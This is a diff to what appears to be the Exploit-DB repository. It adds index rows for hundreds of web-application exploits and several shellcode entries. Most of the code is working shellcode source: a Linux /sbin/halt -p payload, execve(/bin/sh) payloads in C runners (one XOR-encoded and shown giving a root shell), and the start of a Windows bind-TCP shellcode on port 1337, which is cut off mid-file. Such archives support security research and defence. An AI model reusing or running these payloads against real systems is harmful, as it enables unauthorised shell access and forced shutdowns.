49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",1970-01-01,LiquidWorm,webapps,windows,
49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",1970-01-01,MoeAlBarbari,webapps,multiple,
49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php,
49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",1970-01-01,"Park Won Seok",webapps,php,
49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",1970-01-01,"Park Won Seok",webapps,php,
49356,exploits/php/webapps/49356.txt,"Online Movie Streaming 1.0 - Authentication Bypass",1970-01-01,"Kshitiz Raj",webapps,php,
@ -43926,6 +43955,11 @@ id,file,description,date,author,type,platform,port
49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",1970-01-01,"numan türle",webapps,multiple,
49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",1970-01-01,LiquidWorm,webapps,hardware,
49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",1970-01-01,LiquidWorm,webapps,hardware,
49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",1970-01-01,"Richard Jones",webapps,php,
49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",1970-01-01,"Richard Jones",webapps,php,
49693,exploits/php/webapps/49693.php,"WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal",1970-01-01,"Nicholas Ferreira",webapps,php,
@ -43935,7 +43969,10 @@ id,file,description,date,author,type,platform,port
49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",1970-01-01,WangYihang,webapps,multiple,
49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",1970-01-01,MiningOmerta,webapps,hardware,
49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",1970-01-01,"Jithin KS",webapps,hardware,
49712,exploits/php/webapps/49712.html,"'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery",1970-01-01,"Abhishek Joshi",webapps,php,
49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting",1970-01-01,"George Tsimpidas",webapps,php,
49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",1970-01-01,Vincent666,webapps,php,
49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)",1970-01-01,"Murat ŞEKER",webapps,php,
49718,exploits/php/webapps/49718.txt,"WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)",1970-01-01,m0ze,webapps,php,
49720,exploits/hardware/webapps/49720.txt,"TP-Link Devices - 'setDefaultHostname' Stored Cross-site Scripting (Unauthenticated)",1970-01-01,"Smriti Gaba",webapps,hardware,
49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",1970-01-01,"Quadron Research Lab",webapps,php,
@ -43957,6 +43994,7 @@ id,file,description,date,author,type,platform,port
49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",1970-01-01,"Michael Ikua",webapps,php,
49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",1970-01-01,gosh,webapps,windows,
49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",1970-01-01,gosh,webapps,windows,
49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion",1970-01-01,gosh,webapps,ios,
49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",1970-01-01,Captain_hook,webapps,multiple,
49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",1970-01-01,"Orion Hridoy",webapps,php,
49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",1970-01-01,"Rhino Security Labs",webapps,windows,
@ -43983,6 +44021,7 @@ id,file,description,date,author,type,platform,port
49779,exploits/php/webapps/49779.txt,"BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ömer Hasan Durmuş",webapps,php,
49781,exploits/php/webapps/49781.py,"RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,php,
49795,exploits/php/webapps/49795.txt,"RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Saud Ahmad",webapps,php,
49783,exploits/php/webapps/49783.py,"rconfig 3.9.6 - Arbitrary File Upload",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",1970-01-01,Hato0,webapps,php,
49785,exploits/hardware/webapps/49785.txt,"Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
49786,exploits/hardware/webapps/49786.txt,"Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,hardware,
@ -43993,6 +44032,7 @@ id,file,description,date,author,type,platform,port
49794,exploits/perl/webapps/49794.py,"OTRS 6.0.1 - Remote Command Execution (2)",1970-01-01,Hex_26,webapps,perl,
49797,exploits/php/webapps/49797.txt,"Moodle 3.10.3 - 'url' Persistent Cross Site Scripting",1970-01-01,UVision,webapps,php,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,nu11secur1ty,webapps,multiple,
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,webapps,hardware,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",1970-01-01,"Fellipe Oliveira",webapps,python,
49804,exploits/php/webapps/49804.py,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (2)",1970-01-01,nu11secur1ty,webapps,php,
@ -44078,6 +44118,7 @@ id,file,description,date,author,type,platform,port
49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",1970-01-01,enox,webapps,ruby,
49955,exploits/hardware/webapps/49955.py,"OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)",1970-01-01,SecNigma,webapps,hardware,
49958,exploits/php/webapps/49958.txt,"WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hardik Solanki",webapps,php,
49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)",1970-01-01,enox,webapps,linux,
49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",1970-01-01,enox,webapps,php,
49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,php,
@ -44107,6 +44148,7 @@ id,file,description,date,author,type,platform,port
50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",1970-01-01,"BHAVESH KAUL",webapps,php,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",1970-01-01,"BHAVESH KAUL",webapps,tru64,
50016,exploits/php/webapps/50016.txt,"Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting",1970-01-01,"Fatih İLGİN",webapps,php,
50017,exploits/php/webapps/50017.py,"OpenEMR 5.0.1.3 - Authentication Bypass",1970-01-01,"Ron Jost",webapps,php,
50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",1970-01-01,nhattruong,webapps,php,
50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",1970-01-01,ahmed,webapps,php,
@ -44130,6 +44172,8 @@ id,file,description,date,author,type,platform,port
50053,exploits/php/webapps/50053.txt,"Online Library Management System 1.0 - 'Search' SQL Injection",1970-01-01,"Berk Can Geyikci",webapps,php,
50054,exploits/php/webapps/50054.py,"Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)",1970-01-01,"Berk Can Geyikci",webapps,php,
50055,exploits/php/webapps/50055.txt,"Simple CRM 3.0 - 'email' SQL injection (Authentication Bypass)",1970-01-01,"Rinku Kumar",webapps,php,
50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,CHackA0101,webapps,multiple,
50460,exploits/php/webapps/50460.txt,"WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware,
50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux,
@ -44274,6 +44318,7 @@ id,file,description,date,author,type,platform,port
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",1970-01-01,a-rey,webapps,php,
50441,exploits/hardware/webapps/50441.py,"Hikvision Web Server Build 210702 - Command Injection",1970-01-01,bashis,webapps,hardware,
50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting",1970-01-01,a-rey,webapps,php,
50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,
50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
@ -44290,6 +44335,7 @@ id,file,description,date,author,type,platform,port
50285,exploits/hardware/webapps/50285.txt,"ECOA Building Automation System - Local File Disclosure",1970-01-01,Neurogenesia,webapps,hardware,
50286,exploits/hardware/webapps/50286.txt,"ECOA Building Automation System - Arbitrary File Deletion",1970-01-01,Neurogenesia,webapps,hardware,
50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection",1970-01-01,mari0x00,webapps,php,
50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php,
50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php,
@ -44304,6 +44350,8 @@ id,file,description,date,author,type,platform,port
50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php,
50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php,
@ -44321,6 +44369,7 @@ id,file,description,date,author,type,platform,port
50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,
50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php,
50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php,
50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware,
50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware,
@ -44330,6 +44379,7 @@ id,file,description,date,author,type,platform,port
50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50349,exploits/php/webapps/50349.txt,"WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php,
50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php,
50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php,
@ -44337,12 +44387,14 @@ id,file,description,date,author,type,platform,port
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple,
50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple,
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php,
50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php,
@ -44350,6 +44402,7 @@ id,file,description,date,author,type,platform,port
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple,

Can't render this file because it is too large.

5
files_shellcodes.csv
View file

@ -1025,4 +1025,9 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86

1 id file description date author type platform
1025 48592 shellcodes/linux_x86/48592.c Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode linux_x86
1026 48703 shellcodes/linux_x86/48703.c Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes) 1970-01-01 danf42 shellcode linux_x86
1027 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 1970-01-01 Siddharth Sharma shellcode windows_x86
1028 49756 shellcodes/linux/49756.asm Linux/x64 - /sbin/halt -p Shellcode (51 bytes) 1970-01-01 Chenthur Velan shellcode linux
1029 49768 shellcodes/linux_x86/49768.c Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) 1970-01-01 s1ege shellcode linux_x86
1030 49770 shellcodes/linux_x86-64/49770.c Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) 1970-01-01 s1ege shellcode linux_x86-64
1031 49976 shellcodes/linux_x86/49976.c Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) 1970-01-01 d7x shellcode linux_x86
1032 50291 shellcodes/windows_x86-64/50291.c Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) 1970-01-01 Xenofon Vassilakopoulos shellcode windows_x86-64
1033 50384 shellcodes/windows_x86/50384.c Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) 1970-01-01 Daniel Ortiz shellcode windows_x86

28
shellcodes/linux/49756.asm Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Linux/x64 - /sbin/halt -p Shellcode (51 bytes)
# Date: 07/04/2020
# Exploit Author: Chenthur Velan
# Version: 0.0.1
# Tested on: Linux Intelx86-64
global _start
_start:
xor rax, rax
push rax
push word 0x702d
mov rcx, rsp
push rax
mov r8, 0x746c61682f2f2f2f
mov r10, 0x6e6962732f2f2f2f
push r8
push r10
mov rdi, rsp
push rax
push rcx
push rdi
mov rsi, rsp
add rax, 59
syscall

46
shellcodes/linux_x86-64/49770.c Normal file
View file

@ -0,0 +1,46 @@
# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
# Author: s1ege
# Tested on: x86_64 GNU/Linux
# Shellcode Length: 21
/*
################################################
objdump disassembly
################################################
401000: 50 push %rax
401001: 48 31 d2 xor %rdx,%rdx
401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
40100b: 2f 73 68
40100e: 53 push %rbx
40100f: 54 push %rsp
401010: 5f pop %rdi
401011: b0 3b mov $0x3b,%al
401013: 0f 05 syscall
################################################
################################################
shellcode.asm
################################################
; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
section .text
global _start
_start:
push rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall
################################################
*/
unsigned char shellcode[] = \
"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
int main() {
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}

30
shellcodes/linux_x86/49768.c Normal file
View file

@ -0,0 +1,30 @@
# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
# Author: s1ege
# Tested on: i686 GNU/Linux
# Shellcode length: 17
/*
; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
section .text
global _start
_start:
push 0x0b
pop eax
push 0x0068732f
push 0x6e69622f
mov ebx, esp
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main() {
printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
int (*ret)() = (int(*)())code;
ret();
return 0;
}

74
shellcodes/linux_x86/49976.c Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
# Date: 09/06/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
shellcode with XOR decoder stub and fstenv MMX FPU
spawning a /bin/sh shell
uses the fstenv GetPC technique to get the memory address dynamically
(alternative to jmp-call-pop)
Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
./mmx-xor-decoder_eip
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
PID TTY TIME CMD
24045 pts/4 00:00:00 sh
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
/***
; shellcode assembly
global _start
section .text
_start:
fldz
fstenv [esp-0xc]
pop edi ; put eip into edi
add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)
lea esi, [edi + 8]
xor ecx, ecx
mov cl, 4
decode:
movq mm0, qword [edi]
movq mm1, qword [esi]
pxor mm0, mm1
movq qword [esi], mm0
add esi, 0x8
loop decode
jmp short EncodedShellcode
shellcode:
decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d
***/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
void main(void)
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int(*ret)() = (int(*)())shellcode;
ret();
}

324
shellcodes/windows_x86/50384.c Normal file
View file

@ -0,0 +1,324 @@
; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
; Author: h4pp1n3ss
; Date: Wed 10/06/2021
; Tested on: Microsoft Windows [Version 10.0.19042.1237]
; Description:
; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
start: ;
mov ebp, esp ;
add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering
find_kernel32:
xor ecx, ecx ; ECX = Null
mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0x0C] ; ESI = PEB->Ldr
mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
next_module: ;
